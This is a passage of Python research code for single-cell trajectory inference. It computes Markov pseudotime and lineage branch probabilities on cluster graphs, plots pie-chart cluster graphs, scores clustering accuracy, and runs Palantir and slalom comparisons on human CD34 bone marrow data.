node_deg_list.append(item)
print('a_i shape, true labels shape', a_i.shape, len(sc_truelabels_subi), len(sc_labels_subi))
new_root_index_found = False
for ii, llabel in enumerate(cluster_labels_subi):
if root_i == llabel:
new_root_index = ii
new_root_index_found = True
print('new root index', new_root_index)
if new_root_index_found == False:
print('cannot find the new root index')
new_root_index = 0
hitting_times, roundtrip_times = self.compute_hitting_time(a_i, root=new_root_index,
x_lazy=x_lazy, alpha_teleport=alpha_teleport)
# rescale hitting times
very_high = np.mean(hitting_times) + 1.5 * np.std(hitting_times)
without_very_high_pt = [iii for iii in hitting_times if iii < very_high]
new_very_high = np.mean(without_very_high_pt) + np.std(without_very_high_pt)
print('very high, and new very high', very_high, new_very_high)
new_hitting_times = [x if x < very_high else very_high for x in hitting_times]
hitting_times = np.asarray(new_hitting_times)
scaling_fac = 10 / max(hitting_times)
hitting_times = hitting_times * scaling_fac
s_ai, t_ai = a_i.nonzero()
edgelist_ai = list(zip(s_ai, t_ai))
edgeweights_ai = a_i.data
# print('edgelist ai', edgelist_ai)
# print('edgeweight ai', edgeweights_ai)
biased_edgeweights_ai = get_biased_weights(edgelist_ai, edgeweights_ai, hitting_times)
# biased_sparse = csr_matrix((biased_edgeweights, (row, col)))
adjacency_matrix_ai = np.zeros((a_i.shape[0], a_i.shape[0]))
for i, (start, end) in enumerate(edgelist_ai):
adjacency_matrix_ai[start, end] = biased_edgeweights_ai[i]
markov_hitting_times_ai = self.simulate_markov(adjacency_matrix_ai,
new_root_index) # +adjacency_matrix.T))
print('markov_hitting times ')
for eee, ttt in enumerate(markov_hitting_times_ai):
print('cluster ', eee, ' had markov time', ttt)
very_high = np.mean(markov_hitting_times_ai) + 1.5 * np.std(markov_hitting_times_ai)
very_high = min(very_high, max(markov_hitting_times_ai))
without_very_high_pt = [iii for iii in markov_hitting_times_ai if iii < very_high]
new_very_high = min(np.mean(without_very_high_pt) + np.std(without_very_high_pt), very_high)
print('very high, and new very high', very_high, new_very_high)
new_markov_hitting_times_ai = [x if x < very_high else very_high for x in markov_hitting_times_ai]
for eee, ttt in enumerate(new_markov_hitting_times_ai):
print('cluster ', eee, ' had markov time', ttt)
markov_hitting_times_ai = np.asarray(new_markov_hitting_times_ai)
scaling_fac = 10 / max(markov_hitting_times_ai)
markov_hitting_times_ai = markov_hitting_times_ai * scaling_fac
for eee, ttt in enumerate(markov_hitting_times_ai):
print('cluster ', eee, ' had markov time', ttt)
print('markov hitting times', [(i, j) for i, j in enumerate(markov_hitting_times_ai)])
print('hitting times', [(i, j) for i, j in enumerate(hitting_times)])
markov_hitting_times_ai = (markov_hitting_times_ai )#+ hitting_times)*.5 #consensus
adjacency_matrix_csr_ai = sparse.csr_matrix(adjacency_matrix_ai)
(sources, targets) = adjacency_matrix_csr_ai.nonzero()
edgelist_ai = list(zip(sources, targets))
weights_ai = adjacency_matrix_csr_ai.data
bias_weights_2_ai = get_biased_weights(edgelist_ai, weights_ai, markov_hitting_times_ai, round_no=2)
adjacency_matrix2_ai = np.zeros((adjacency_matrix_ai.shape[0], adjacency_matrix_ai.shape[0]))
for i, (start, end) in enumerate(edgelist_ai):
adjacency_matrix2_ai[start, end] = bias_weights_2_ai[i]
if self.super_terminal_cells == False:
terminal_clus_ai = self.get_terminal_clusters(adjacency_matrix2_ai, markov_hitting_times_ai,
new_root_index)
for i in terminal_clus_ai:
terminal_clus.append(cluster_labels_subi[i])
elif len(self.super_terminal_clusters) > 0:
sub_terminal_clus_temp_ = []
terminal_clus_ai = []
for i in self.super_terminal_clusters:
print('super cluster terminal label', i)
sub_terminal_clus_temp_loc = np.where(np.asarray(self.super_cluster_labels) == i)[0]
# print('sub_terminal_clus_temp_loc', sub_terminal_clus_temp_loc)
temp_set = set(list(np.asarray(self.labels)[sub_terminal_clus_temp_loc]))
# print('temp set', temp_set)
temp_max_pt = 0
most_likely_sub_terminal = False
count_frequency_super_in_sub = 0
for j in temp_set:
super_cluster_composition_loc = np.where(np.asarray(self.labels) == j)[0]
super_cluster_composition = self.func_mode(
list(np.asarray(self.super_cluster_labels)[super_cluster_composition_loc]))
# print('the composision of sub cluster', j, 'is mostly', super_cluster_composition)
if (markov_hitting_times_ai[j] > temp_max_pt) & (super_cluster_composition == i):
temp_max_pt = markov_hitting_times_ai[j]
print('super, j and temp max pt', i, j, temp_max_pt)
most_likely_sub_terminal = j
if most_likely_sub_terminal == False:
print('no sub cluster has majority made of super-cluster ', i)
for j in temp_set:
super_cluster_composition_loc = np.where(np.asarray(self.labels) == j)[0]
count_frequency_super_in_sub_temp = list(
np.asarray(self.super_cluster_labels)[super_cluster_composition_loc]).count(i)
count_frequency_super_in_sub_temp_ratio = count_frequency_super_in_sub_temp/len(super_cluster_composition_loc)
if (markov_hitting_times_ai[j] > np.percentile(
np.asarray(markov_hitting_times_ai), 30)) & (
count_frequency_super_in_sub_temp_ratio > count_frequency_super_in_sub):
count_frequency_super_in_sub = count_frequency_super_in_sub_temp
#temp_max_pt = markov_hitting_times_ai[j]
most_likely_sub_terminal = j
sub_terminal_clus_temp_.append(most_likely_sub_terminal)
if (markov_hitting_times_ai[most_likely_sub_terminal] > np.percentile(
np.asarray(markov_hitting_times_ai), 30)):
dict_terminal_super_sub_pairs.update({i: most_likely_sub_terminal})
super_terminal_clus_revised.append(i)
terminal_clus.append(most_likely_sub_terminal)
terminal_clus_ai.append(
np.where(np.asarray(cluster_labels_subi) == most_likely_sub_terminal)[0][0]) # =i
# terminal_clus_ai.append(most_likely_sub_terminal)
print('the sub terminal cluster that best captures the super terminal', i, 'is',
most_likely_sub_terminal)
else:
print('the sub terminal cluster that best captures the super terminal', i, 'is',
most_likely_sub_terminal, 'but the pseudotime is too low')
else:
print('super terminal cells', self.super_terminal_cells)
print([self.labels[ti] for ti in
self.super_terminal_cells]) # find the sub-cluster which contains the single-cell-superterminal
temp = [self.labels[ti] for ti in self.super_terminal_cells if
self.labels[ti] in cluster_labels_subi]
terminal_clus_ai = []
for i in temp:
terminal_clus_ai.append(np.where(np.asarray(cluster_labels_subi) == i)[0][0])
terminal_clus.append(i)
dict_terminal_super_sub_pairs.update({i: most_likely_sub_terminal})
# for i in temp:
# terminal_clus.append(i)
print('terminal clus in this a_i', terminal_clus_ai)
print('final terminal clus', terminal_clus)
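# For each terminal cluster, estimate branch (lineage) probabilities by Markov
# simulations on the biased cluster graph starting from the root; the per-cluster
# probabilities are stored as new 'terminal_clus*' columns of df_graph and later
# row-normalised so that each cluster's probabilities over terminal states sum to 1.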
for target_terminal in terminal_clus_ai:
#prob_ai = self.prob_reaching_terminal_state(target_terminal, terminal_clus_ai, adjacency_matrix2_ai, new_root_index, pt=markov_hitting_times_ai, num_sim=500)
prob_ai = self.simulate_branch_probability(target_terminal, terminal_clus_ai, adjacency_matrix2_ai,
new_root_index, pt=markov_hitting_times_ai, num_sim=500) #50 ToDO change back to 500 = numsim
df_graph['terminal_clus' + str(cluster_labels_subi[target_terminal])] = 0.0000000
pd_columnnames_terminal.append('terminal_clus' + str(cluster_labels_subi[target_terminal]))
print('prob ai for target terminal', target_terminal, prob_ai)
for k, prob_ii in enumerate(prob_ai):
df_graph.at[cluster_labels_subi[k], 'terminal_clus' + str(
cluster_labels_subi[target_terminal])] = prob_ii
bp_array = df_graph[pd_columnnames_terminal].values
bp_array[np.isnan(bp_array)]=0.00000001
#print('final bp_array NOT normed by rowsum', bp_array)
bp_array = bp_array / bp_array.sum(axis=1)[:, None]
bp_array[np.isnan(bp_array)] = 0.00000001
#print('final bp_array normed by rowsum', bp_array)
for ei, ii in enumerate(loc_compi):
df_graph.at[ii, 'pt'] = hitting_times[ei]
df_graph.at[ii, 'graph_node_label'] = graph_node_label[ei]
df_graph.at[ii, 'majority_truth'] = graph_node_label[ei]
df_graph.at[ii, 'markov_pt'] = markov_hitting_times_ai[ei]
locallytrimmed_g.vs["label"] = df_graph['graph_node_label'].values
hitting_times = df_graph['pt'].values
if len(super_terminal_clus_revised) > 0:
self.revised_super_terminal_clusters = super_terminal_clus_revised
else:
self.revised_super_terminal_clusters = self.super_terminal_clusters
self.hitting_times = hitting_times # * 1000
self.markov_hitting_times = df_graph['markov_pt'].values
self.terminal_clusters = terminal_clus
print('terminal clusters', terminal_clus)
self.node_degree_list = node_deg_list
print(colored('project onto sc','red'))
self.project_branch_probability_sc(bp_array, df_graph['markov_pt'].values)
self.dict_terminal_super_sub_pairs = dict_terminal_super_sub_pairs
hitting_times = self.markov_hitting_times
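# Re-bias the full cluster-graph edge weights with the Markov pseudotime and rebuild
# a sparse adjacency matrix; the graph is then pruned below purely for visualisation.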
bias_weights_2_all = get_biased_weights(edgelist, edgeweights, self.markov_hitting_times, round_no=2)
row_list = []
col_list = []
for (rowi, coli) in edgelist:
row_list.append(rowi)
col_list.append(coli)
# print('shape', a_i.shape[0], a_i.shape[0], row_list)
temp_csr = csr_matrix((np.array(bias_weights_2_all), (np.array(row_list), np.array(col_list))),
shape=(n_clus, n_clus))
if self.dataset == 'toy': # 'humanCD34':#False:
visual_global_pruning_std = 0.15
max_outgoing = 4
else:
visual_global_pruning_std = 1 # 0.15#0 for human
max_outgoing = 2
# glob_std_pruning =0 and max_out = 2 for HumanCD34 to simplify structure
edgeweights_maxout_2, edgelist_maxout_2, comp_labels_2 = local_pruning_clustergraph_mst(temp_csr,
global_pruning_std=visual_global_pruning_std,
max_outgoing=max_outgoing,
preserve_disconnected=self.preserve_disconnected)
row_list = []
col_list = []
for (rowi, coli) in edgelist_maxout_2:
row_list.append(rowi)
col_list.append(coli)
temp_csr = csr_matrix((np.array(edgeweights_maxout_2), (np.array(row_list), np.array(col_list))),
shape=(n_clus, n_clus))
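# Symmetrise the pruned graph and keep only the strictly lower triangle so that each
# undirected edge appears exactly once in the final visualisation edge list.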
temp_csr = temp_csr.transpose().todense() + temp_csr.todense()
temp_csr = np.tril(temp_csr, -1) # elements along the main diagonal and above are set to zero
temp_csr = csr_matrix(temp_csr)
edgeweights_maxout_2 = temp_csr.data
scale_factor = max(edgeweights_maxout_2) - min(edgeweights_maxout_2)
edgeweights_maxout_2 = [((wi + .1) * 2.5 / scale_factor) + 0.1 for wi in edgeweights_maxout_2]
sources, targets = temp_csr.nonzero()
edgelist_maxout_2 = list(zip(sources.tolist(), targets.tolist()))
self.edgelist_maxout = edgelist_maxout_2
self.edgeweights_maxout = edgeweights_maxout_2
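# Clip pseudotime outliers (roughly at the 5th/95th percentiles) and rescale to
# [0, 1000] for colour mapping. Illustrative sketch of the same idea:
#   pt = np.clip(pt, np.percentile(pt, 5), np.percentile(pt, 95))
#   pt = (pt - pt.min()) * 1000 / (pt.max() - pt.min())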
remove_outliers = hitting_times
threshold = np.percentile(remove_outliers, 95) # np.mean(remove_outliers) + 1* np.std(remove_outliers)
th_hitting_times = [x if x < threshold else threshold for x in hitting_times]
remove_outliers_low = hitting_times[hitting_times < (np.mean(hitting_times) - 0.3 * np.std(hitting_times))]
threshold_low = np.mean(remove_outliers_low) - 0.3 * np.std(remove_outliers_low)
threshold_low = np.percentile(remove_outliers_low, 5)
# print('thresh low', threshold_low)
th_hitting_times = [x if x > threshold_low else threshold_low for x in th_hitting_times]
scaled_hitting_times = (th_hitting_times - np.min(th_hitting_times))
scaled_hitting_times = scaled_hitting_times * (1000 / np.max(scaled_hitting_times))
self.scaled_hitting_times = scaled_hitting_times
# self.single_cell_pt = self.project_hittingtimes_sc(self.hitting_times)
# self.single_cell_pt_stationary_bias = self.project_hittingtimes_sc(self.stationary_hitting_times.flatten())
# self.dijkstra_hitting_times = self.path_length_onbias(edgelist, biased_edgeweights)
# print('dijkstra hitting times', [(i,j) for i,j in enumerate(self.dijkstra_hitting_times)])
# self.single_cell_pt_dijkstra_bias = self.project_hittingtimes_sc(self.dijkstra_hitting_times)
scaled_hitting_times = scaled_hitting_times.astype(int)
pal = ig.drawing.colors.AdvancedGradientPalette(['yellow', 'green', 'blue'], n=1001)
all_colors = []
for i in scaled_hitting_times:
all_colors.append(pal.get(int(i))[0:3])
locallytrimmed_g.vs['hitting_times'] = scaled_hitting_times
locallytrimmed_g.vs['color'] = [pal.get(i)[0:3] for i in scaled_hitting_times]
self.group_color = [colors.to_hex(v) for v in locallytrimmed_g.vs['color']] # based on ygb scale
viridis_cmap = cm.get_cmap('viridis_r')
self.group_color_cmap = [colors.to_hex(v) for v in
viridis_cmap(scaled_hitting_times / 1000)] # based on ygb scale
self.graph_node_label = df_graph['graph_node_label'].values
self.edgeweight = [e['weight'] * 1 for e in locallytrimmed_g.es]
print('self edge weight', len(self.edgeweight), self.edgeweight)
print('self edge list', len(self.edgelist_unique), self.edgelist_unique)
self.graph_node_pos = layout.coords
f, ((ax, ax1)) = plt.subplots(1, 2, sharey=True)
self.draw_piechart_graph(ax, ax1)
plt.show()
return
def draw_piechart_graph(self, ax, ax1, type_pt='original', ):
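# Draws the cluster graph twice: `ax` shows each cluster as a pie chart of its
# reference (true-label) composition, sized by cluster population; `ax1` shows the
# same layout coloured by pseudotime, with terminal clusters outlined in red.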
arrow_head_w = 0.2
edgeweight_scale = 1
node_pos = self.graph_node_pos
edgelist = list(self.edgelist_maxout)
edgeweight = self.edgeweights_maxout
node_pos = np.asarray(node_pos)
graph_node_label = self.graph_node_label
if type_pt == 'original': pt = self.scaled_hitting_times
if type_pt == 'biased_stationary': pt = self.biased_hitting_times_stationary
if type_pt == 'markov': pt = self.markov_hitting_times
import matplotlib.lines as lines
n_groups = len(set(self.labels)) # node_pos.shape[0]
n_truegroups = len(set(self.true_label))
group_pop = np.zeros([n_groups, 1])
group_frac = pd.DataFrame(np.zeros([n_groups, n_truegroups]), columns=list(set(self.true_label)))
for group_i in set(self.labels):
loc_i = np.where(self.labels == group_i)[0]
group_pop[group_i] = len(loc_i) # np.sum(loc_i) / 1000 + 1
true_label_in_group_i = list(np.asarray(self.true_label)[loc_i])
for ii in set(true_label_in_group_i):
group_frac[ii][group_i] = true_label_in_group_i.count(ii)
group_frac = group_frac.div(group_frac.sum(axis=1), axis=0)
line_true = np.linspace(0, 1, n_truegroups)
color_true_list = [plt.cm.jet(color) for color in line_true]
sct = ax.scatter(
node_pos[:, 0], node_pos[:, 1],
c='white', edgecolors='face', s=group_pop, cmap='jet')
print('draw triangle edgelist', len(edgelist), edgelist)
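# Draw each edge with an arrow pointing from lower to higher pseudotime; start/end
# are swapped first so that the arrow always follows the direction of increasing pt.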
for e_i, (start, end) in enumerate(edgelist):
if pt[start] > pt[end]:
temp = start
start = end
end = temp
ax.add_line(lines.Line2D([node_pos[start, 0], node_pos[end, 0]], [node_pos[start, 1], node_pos[end, 1]],
color='grey', lw=edgeweight[e_i] * edgeweight_scale, alpha=0.2))
z = np.polyfit([node_pos[start, 0], node_pos[end, 0]], [node_pos[start, 1], node_pos[end, 1]], 1)
minx = np.min(np.array([node_pos[start, 0], node_pos[end, 0]]))
if (node_pos[start, 0] < node_pos[end, 0]):
direction_arrow = 1
else:
direction_arrow = -1
maxx = np.max(np.array([node_pos[start, 0], node_pos[end, 0]]))
xp = np.linspace(minx, maxx, 500)
p = np.poly1d(z)
smooth = p(xp)
step = 1
if direction_arrow == 1:
ax.arrow(xp[250], smooth[250], xp[250 + step] - xp[250], smooth[250 + step] - smooth[250], shape='full',
lw=0,
length_includes_head=True, head_width=arrow_head_w,
color='grey')
# ax.plot(xp, smooth, linewidth=edgeweight[e_i], c='pink')
else:
ax.arrow(xp[250], smooth[250], xp[250 - step] - xp[250],
smooth[250 - step] - smooth[250], shape='full', lw=0,
length_includes_head=True, head_width=arrow_head_w, color='grey')
trans = ax.transData.transform
bbox = ax.get_position().get_points()
ax_x_min = bbox[0, 0]
ax_x_max = bbox[1, 0]
ax_y_min = bbox[0, 1]
ax_y_max = bbox[1, 1]
ax_len_x = ax_x_max - ax_x_min
ax_len_y = ax_y_max - ax_y_min
trans2 = ax.transAxes.inverted().transform
pie_axs = []
pie_size_ar = ((group_pop - np.min(group_pop)) / (np.max(group_pop) - np.min(group_pop)) + 0.5) / 10
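# Place a small pie-chart inset at every node: pie size is the min-max normalised
# cluster population, and node positions are converted from data coordinates to
# axes coordinates (via display coordinates) before creating each inset axes.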
for node_i in range(n_groups):
pie_size = pie_size_ar[node_i][0]
x1, y1 = trans(node_pos[node_i]) # data coordinates
xa, ya = trans2((x1, y1)) # axis coordinates
xa = ax_x_min + (xa - pie_size / 2) * ax_len_x
ya = ax_y_min + (ya - pie_size / 2) * ax_len_y
# clip: the Fruchterman layout sometimes places nodes below the figure
# if ya < 0: ya = 0
# if xa < 0: xa = 0
rect = [xa, ya, pie_size * ax_len_x, pie_size * ax_len_y]
frac = group_frac.iloc[node_i].values
pie_axs.append(plt.axes(rect, frameon=False))
pie_axs[node_i].pie(frac, wedgeprops={'linewidth': 0.0}, colors=color_true_list)
pie_axs[node_i].set_xticks([])
pie_axs[node_i].set_yticks([])
pie_axs[node_i].set_aspect('equal')
pie_axs[node_i].text(0.5, 0.5, graph_node_label[node_i])
patches, texts = pie_axs[node_i].pie(frac, wedgeprops={'linewidth': 0.0}, colors=color_true_list)
labels = list(set(self.true_label))
plt.legend(patches, labels, loc=(-5, -5), fontsize=6)
if self.too_big_factor > 0.1:
is_sub = ' super clusters'
else:
is_sub = ' sub clusters'
ti = 'Reference Group Membership. K=' + str(self.knn) + '. ncomp = ' + str(self.ncomp) + is_sub
ax.set_title(ti)
title_list = ["PT using Markov Simulation"]#, "PT on undirected original graph"]
for i, ax_i in enumerate([ax1]):
print("drawing axis", i)
if i == 0: pt = self.markov_hitting_times
if i == 1: pt = self.hitting_times
for e_i, (start, end) in enumerate(edgelist):
if pt[start] > pt[end]:
temp = start
start = end
end = temp
ax_i.add_line(
lines.Line2D([node_pos[start, 0], node_pos[end, 0]], [node_pos[start, 1], node_pos[end, 1]],
color='black', lw=edgeweight[e_i] * edgeweight_scale, alpha=0.5))
z = np.polyfit([node_pos[start, 0], node_pos[end, 0]], [node_pos[start, 1], node_pos[end, 1]], 1)
minx = np.min(np.array([node_pos[start, 0], node_pos[end, 0]]))
if (node_pos[start, 0] < node_pos[end, 0]):
direction_arrow = 1
else:
direction_arrow = -1
maxx = np.max(np.array([node_pos[start, 0], node_pos[end, 0]]))
xp = np.linspace(minx, maxx, 500)
p = np.poly1d(z)
smooth = p(xp)
step = 1
if direction_arrow == 1:
ax_i.arrow(xp[250], smooth[250], xp[250 + step] - xp[250], smooth[250 + step] - smooth[250],
shape='full', lw=0,
length_includes_head=True, head_width=arrow_head_w,
color='grey')
else:
ax_i.arrow(xp[250], smooth[250], xp[250 - step] - xp[250],
smooth[250 - step] - smooth[250], shape='full', lw=0,
length_includes_head=True, head_width=arrow_head_w, color='grey')
c_edge = []
l_width = []
for ei, pti in enumerate(pt):
if ei in self.terminal_clusters:
c_edge.append('red')
l_width.append(1.5)
else:
c_edge.append('gray')
l_width.append(0.0)
gp_scaling = 500 / max(group_pop)
print(gp_scaling, 'gp_scaling')
group_pop_scale = group_pop * gp_scaling
ax_i.scatter(node_pos[:, 0], node_pos[:, 1], s=group_pop_scale, c=pt, cmap='viridis_r', edgecolors=c_edge,
alpha=1, zorder=3, linewidth=l_width)
for ii in range(node_pos.shape[0]):
ax_i.text(node_pos[ii, 0] + 0.5, node_pos[ii, 1] + 0.5, 'c' + str(ii), color='black', zorder=4)
title_pt = title_list[i]
ax_i.set_title(title_pt)
def accuracy(self, onevsall=1):
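# One-vs-all evaluation: a cluster is assigned to the target class when its majority
# true label equals `onevsall`; TP/FP/TN/FN are accumulated cluster by cluster to give
# the error rate, precision, recall and F1-score for that target population.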
true_labels = self.true_label
Index_dict = {}
PARC_labels = self.labels
N = len(PARC_labels)
n_cancer = list(true_labels).count(onevsall)
n_pbmc = N - n_cancer
for k in range(N):
Index_dict.setdefault(PARC_labels[k], []).append(true_labels[k])
num_groups = len(Index_dict)
sorted_keys = list(sorted(Index_dict.keys()))
error_count = []
pbmc_labels = []
thp1_labels = []
fp, fn, tp, tn, precision, recall, f1_score = 0, 0, 0, 0, 0, 0, 0
for kk in sorted_keys:
vals = [t for t in Index_dict[kk]]
majority_val = self.func_mode(vals)
if majority_val == onevsall: print('cluster', kk, ' has majority', onevsall, 'with population', len(vals))
if kk == -1:
len_unknown = len(vals)
print('len unknown', len_unknown)
if (majority_val == onevsall) and (kk != -1):
thp1_labels.append(kk)
fp = fp + len([e for e in vals if e != onevsall])
tp = tp + len([e for e in vals if e == onevsall])
list_error = [e for e in vals if e != majority_val]
e_count = len(list_error)
error_count.append(e_count)
elif (majority_val != onevsall) and (kk != -1):
pbmc_labels.append(kk)
tn = tn + len([e for e in vals if e != onevsall])
fn = fn + len([e for e in vals if e == onevsall])
error_count.append(len([e for e in vals if e != majority_val]))
predict_class_array = np.array(PARC_labels)
PARC_labels_array = np.array(PARC_labels)
number_clusters_for_target = len(thp1_labels)
for cancer_class in thp1_labels:
predict_class_array[PARC_labels_array == cancer_class] = 1
for benign_class in pbmc_labels:
predict_class_array[PARC_labels_array == benign_class] = 0
predict_class_array.reshape((predict_class_array.shape[0], -1))
error_rate = sum(error_count) / N
n_target = tp + fn
tnr = tn / n_pbmc
fnr = fn / n_cancer
tpr = tp / n_cancer
fpr = fp / n_pbmc
if tp != 0 or fn != 0: recall = tp / (tp + fn) # ability to find all positives
if tp != 0 or fp != 0: precision = tp / (tp + fp) # ability to not misclassify negatives as positives
if precision != 0 or recall != 0:
f1_score = precision * recall * 2 / (precision + recall)
majority_truth_labels = np.empty((len(true_labels), 1), dtype=object)
for cluster_i in set(PARC_labels):
cluster_i_loc = np.where(np.asarray(PARC_labels) == cluster_i)[0]
true_labels = np.asarray(true_labels)
majority_truth = self.func_mode(list(true_labels[cluster_i_loc]))
majority_truth_labels[cluster_i_loc] = majority_truth
majority_truth_labels = list(majority_truth_labels.flatten())
accuracy_val = [error_rate, f1_score, tnr, fnr, tpr, fpr, precision,
recall, num_groups, n_target]
return accuracy_val, predict_class_array, majority_truth_labels, number_clusters_for_target
def run_PARC(self):
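# Top-level driver: build the HNSW knn structure, run the clustering / trajectory
# step (run_subPARC), then score every true-label population with the one-vs-all
# accuracy() routine and store the summary in self.stats_df.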
print('input data has shape', self.data.shape[0], '(samples) x', self.data.shape[1], '(features)')
self.ncomp = self.data.shape[1]
pop_list = []
for item in set(list(self.true_label)):
pop_list.append([item, list(self.true_label).count(item)])
# print("population composition", pop_list)
if self.true_label is None:
self.true_label = [1] * self.data.shape[0]
list_roc = []
time_start_total = time.time()
time_start_knn = time.time()
self.knn_struct = self.make_knn_struct()
time_end_knn_struct = time.time() - time_start_knn
# Query dataset, k - number of closest elements (returns 2 numpy arrays)
self.run_subPARC()
run_time = time.time() - time_start_total
print('time elapsed {:.1f} seconds'.format(run_time))
targets = list(set(self.true_label))
N = len(list(self.true_label))
self.f1_accumulated = 0
self.f1_mean = 0
self.stats_df = pd.DataFrame({'jac_std_global': [self.jac_std_global], 'dist_std_local': [self.dist_std_local],
'runtime(s)': [run_time]})
self.majority_truth_labels = []
if len(targets) > 1:
f1_accumulated = 0
f1_acc_noweighting = 0
for onevsall_val in targets:
#print('target is', onevsall_val)
vals_roc, predict_class_array, majority_truth_labels, numclusters_targetval = self.accuracy(
onevsall=onevsall_val)
f1_current = vals_roc[1]
print('target', onevsall_val, 'has f1-score of %.2f' % (f1_current * 100))
f1_accumulated = f1_accumulated + f1_current * (list(self.true_label).count(onevsall_val)) / N
f1_acc_noweighting = f1_acc_noweighting + f1_current
list_roc.append(
[self.jac_std_global, self.dist_std_local, onevsall_val] + vals_roc + [numclusters_targetval] + [
run_time])
f1_mean = f1_acc_noweighting / len(targets)
print("f1-score (unweighted) mean %.2f" % (f1_mean * 100), '%')
#print('f1-score weighted (by population) %.2f' % (f1_accumulated * 100), '%')
df_accuracy = pd.DataFrame(list_roc,
columns=['jac_std_global', 'dist_std_local', 'onevsall-target', 'error rate',
'f1-score', 'tnr', 'fnr',
'tpr', 'fpr', 'precision', 'recall', 'num_groups',
'population of target', 'num clusters', 'clustering runtime'])
self.f1_accumulated = f1_accumulated
self.f1_mean = f1_mean
self.stats_df = df_accuracy
self.majority_truth_labels = majority_truth_labels
return
def run_palantir_func_human34(ad, ncomps, knn, tsne, revised_clus, start_cell='c4823'):
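# Comparison run of Palantir on the human CD34 data: PCA -> diffusion maps ->
# multiscale space -> pseudotime and branch probabilities from the given start cell,
# followed by MAGIC imputation and gene-trend plots for a few marker genes.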
norm_df_pal = pd.DataFrame(ad.X)
# print('norm df', norm_df_pal)
new = ['c' + str(i) for i in norm_df_pal.index]
norm_df_pal.index = new
norm_df_pal.columns =[i for i in ad.var_names]
pca_projections, _ = palantir.utils.run_pca(norm_df_pal, n_components=ncomps)
sc.tl.pca(ad, svd_solver='arpack')
dm_res = palantir.utils.run_diffusion_maps(pca_projections, n_components=ncomps, knn=knn)
ms_data = palantir.utils.determine_multiscale_space(dm_res) # n_eigs is determined using eigengap
print('ms data', ms_data.shape)
# tsne = pd.DataFrame(tsnem)#palantir.utils.run_tsne(ms_data)
tsne.index = new
# print(type(tsne))
str_true_label = pd.Series(revised_clus, index=norm_df_pal.index)
palantir.plot.plot_cell_clusters(tsne, str_true_label)
# start_cell = 'c4823' # '#C108 for M12 connected' #M8n1000d1000 start - c107 #c1001 for bifurc n2000d1000 #disconnected n1000 c108, "C1 for M10 connected" # c10 for bifurcating_m4_n2000d1000
pr_res = palantir.core.run_palantir(ms_data, early_cell=start_cell, num_waypoints=1200, knn=knn)
palantir.plot.plot_palantir_results(pr_res, tsne, knn, ncomps)
#plt.show()
imp_df = palantir.utils.run_magic_imputation(norm_df_pal, dm_res)
#imp_df.to_csv('/home/shobi/Trajectory/Datasets/HumanCD34/MAGIC_palantir_knn30ncomp100.csv')
genes = ['GATA1', 'GATA2', 'ITGA2B']#, 'SPI1']#['CD34','GATA1', 'IRF8','ITGA2B']
gene_trends = palantir.presults.compute_gene_trends( pr_res, imp_df.loc[:, genes])
palantir.plot.plot_gene_trends(gene_trends)
genes = ['MPO','ITGAX','IRF8','CSF1R','IL3RA']#'CD34','MPO', 'CD79B'
gene_trends = palantir.presults.compute_gene_trends(pr_res, imp_df.loc[:, genes])
palantir.plot.plot_gene_trends(gene_trends)
plt.show()
def slalom_human():
import os
import slalom
from slalom import plotFactors, plotRelevance, plotLoadings, saveFA, dumpFA
data_dir = '/home/shobi/Trajectory/Datasets/'
ad = sc.read(
'/home/shobi/Trajectory/Datasets/HumanCD34/human_cd34_bm_rep1.h5ad') # 5780 cells x 14651 genes Human Replicate 1. Male african american, 38 years
df_ = pd.DataFrame(ad.X)
df_.columns = [i for i in ad.var_names]
annoDB = 'custom' # ''MSigDB'
annoFile = os.path.join(data_dir, 'geneset.gmt')
data_slalom = slalom.utils.load_txt(df=df_.T, annoFiles=annoFile, annoDBs=annoDB)
print("Loaded {:d} cells, {:d} genes".format(data_slalom['Y'].shape[0], data_slalom['Y'].shape[1]))
print("Annotation: {:d} terms".format(len(data_slalom['terms'])))
print('data terms', data_slalom['terms'])
print(data_slalom['genes'])
print(data_slalom['lab'])
# I: indicator matrix that assigns genes to pathways
I = data_slalom['I'] # if loaded from the hdf file change to I = data['IMSigDB']
# Y: log expression values
Y = data_slalom['Y']
# terms: the names of the terms
terms = data_slalom['terms']
print("terms", terms)
# gene_ids: the ids of the genes in Y
gene_ids = data_slalom['genes']
print('gene_ids', gene_ids)
print(I.shape, Y.shape, terms.shape)
# initialize FA instance, here using a Gaussian noise model and fitting 3 dense hidden factors
FA = slalom.initFA(Y, terms, I, gene_ids=gene_ids, noise='gauss', nHidden=3, minGenes=1)
FA.train()
# print diagnostics
FA.printDiagnostics()
fig = plotRelevance(FA, madFilter=0)
# idx=FA.getTermIndex(['G2m checkpoint', 'P53 pathway'])
# print('idx',idx)
corrected_data = FA.regressOut(
terms=['M phase', 'Dna replication', 'Chromosome segregation', 'M phase of mitotic cell cycle',
'Organelle fission'])
print('corrected_data.shape', corrected_data.shape)
full_matrix = df_.copy()
print(full_matrix.head())
annotated_genes = np.array(data_slalom['genes'])[np.sum(data_slalom['I'], axis=1) != 0]
print('annotated genes', len(annotated_genes), annotated_genes)
full_matrix[annotated_genes] = corrected_data
print('full shape ', full_matrix)
return full_matrix
def main_Human(ncomps=100, knn=30, p0_random_seed=4, run_palantir_func = False):
dict_abb = {'Basophils': 'BASO1', 'CD4+ Effector Memory': 'TCEL7', 'Colony Forming Unit-Granulocytes': 'GRAN1',
'Colony Forming Unit-Megakaryocytic': 'MEGA1', 'Colony Forming Unit-Monocytes': 'MONO1',
'Common myeloid progenitors': "CMP", 'Early B cells': "PRE_B2", 'Eosinophils': "EOS2",
'Erythroid_CD34- CD71+ GlyA-': "ERY2", 'Erythroid_CD34- CD71+ GlyA+': "ERY3",
'Erythroid_CD34+ CD71+ GlyA-': "ERY1", 'Erythroid_CD34- CD71lo GlyA+': 'ERY4',
'Granulocyte/monocyte progenitors': "GMP", 'Hematopoietic stem cells_CD133+ CD34dim': "HSC1",
'Hematopoietic stem cells_CD38- CD34+': "HSC2",
'Mature B cells class able to switch': "B_a2", 'Mature B cells class switched': "B_a4",
'Mature NK cells_CD56- CD16- CD3-': "Nka3", 'Monocytes': "MONO2",
'Megakaryocyte/erythroid progenitors': "MEP", 'Myeloid Dendritic Cells': 'mDC', 'Naïve B cells': "B_a1",
'Plasmacytoid Dendritic Cells': "pDC", 'Pro B cells': 'PRE_B3'}
ncomps = ncomps# 40 ncomps and 20KNN works well
knn = knn # 30
p0_random_seed =p0_random_seed
string_ = 'ncomp =' +str(ncomps) + ' knn=' + str( knn)+ ' randseed='+ str(p0_random_seed)
#print('ncomp =', ncomps, ' knn=', knn, ' randseed=', p0_random_seed)
print(colored(string_,'blue'))
